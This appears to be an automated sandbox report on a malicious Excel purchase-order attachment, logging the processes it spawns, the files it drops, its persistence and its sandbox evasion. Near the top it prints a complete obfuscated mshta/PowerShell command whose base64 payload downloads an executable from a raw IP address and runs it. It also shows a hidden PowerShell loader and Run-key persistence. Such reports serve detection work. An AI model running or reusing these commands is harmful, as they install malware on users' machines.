          Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Frligheden)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.cmdline"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,34_2_004044A4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE896F022D push eax; iretd 7_2_000007FE896F0241
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE896F00BD pushad ; iretd 7_2_000007FE896F00C1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04B630E8 push eax; iretd 12_2_04B63312
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04B62EB4 push esi; iretd 12_2_04B62EBE
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04B62EBF push esi; iretd 12_2_04B62EC2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04B633CF push edx; iretd 12_2_04B633D2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04B63310 push eax; iretd 12_2_04B63312
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_06554441 push ebp; iretd 12_2_06554442
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_06556667 push ebp; ret 12_2_0655666D
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0655628D push edx; retf 12_2_065562BD
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_06550B59 push eax; iretd 12_2_06550B5B
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_06551F0F push ebx; iretd 12_2_06551F11
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_06554B20 push 763C485Bh; iretd 12_2_06554B2F
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0655472A push 00000058h; retf 12_2_0655473A
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_01941F0F push ebx; iretd 33_2_01941F11
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_01944B20 push 763C485Bh; iretd 33_2_01944B2F
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_0194472A push 00000058h; retf 33_2_0194473A
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_01940B59 push eax; iretd 33_2_01940B5B
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_0194628D push edx; retf 33_2_019462BD
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_01944441 push ebp; iretd 33_2_01944442
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_01946667 push ebp; ret 33_2_0194666D
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0044693D push ecx; ret 34_2_0044694D
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0044DB70 push eax; ret 34_2_0044DB84
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0044DB70 push eax; ret 34_2_0044DBAC
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_00451D54 push eax; ret 34_2_00451D61
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_0044B090 push eax; ret 35_2_0044B0A4
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_0044B090 push eax; ret 35_2_0044B0CC
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_00451D34 push eax; ret 35_2_00451D41
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_00444E71 push ecx; ret 35_2_00444E81
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_00414060 push eax; ret 36_2_00414074
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_00414060 push eax; ret 36_2_0041409C

          Persistence and Installation Behavior

          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\dllhost.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exe
          Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chivey57
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,35_2_004047CB
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\dllhost.exe  Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe  Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: PO 11001 .xls | Stream path 'Workbook' entropy: 7.99942451923 (max. 8.0)
          Source: 54230000.0.dr | Stream path 'Workbook' entropy: 7.99946274459 (max. 8.0)

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | API/Special instruction interceptor: Address: 4FA6CCD
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Code function: 34_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,34_2_0040DD85
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7144
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2813
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4738
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5120
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 729
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1131
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2503
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1006
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 766
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 414
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1665
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 922
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3214
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 711
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.dll
          Source: C:\Windows\System32\mshta.exe TID: 3944 | Thread sleep time: -420000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4072 | Thread sleep count: 7144 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4072 | Thread sleep count: 2813 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116 | Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3136 | Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2076 | Thread sleep time: -360000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2432 | Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\System32\mshta.exe TID: 724 | Thread sleep time: -480000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2592 | Thread sleep count: 729 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2096 | Thread sleep count: 1131 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2860 | Thread sleep time: -240000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2976 | Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1180 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3904 | Thread sleep time: -360000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3908 | Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe TID: 2444 | Thread sleep time: -180000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe TID: 2012 | Thread sleep time: -120000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe TID: 904 | Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1840 | Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 824 | Thread sleep time: -60000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe TID: 3928 | Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1932 | Thread sleep count: 1665 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1932 | Thread sleep count: 199 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3724 | Thread sleep time: -360000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3988 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3936 | Thread sleep count: 922 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3976 | Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3060 | Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe TID: 2108 | Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2592 | Thread sleep count: 3214 > 30
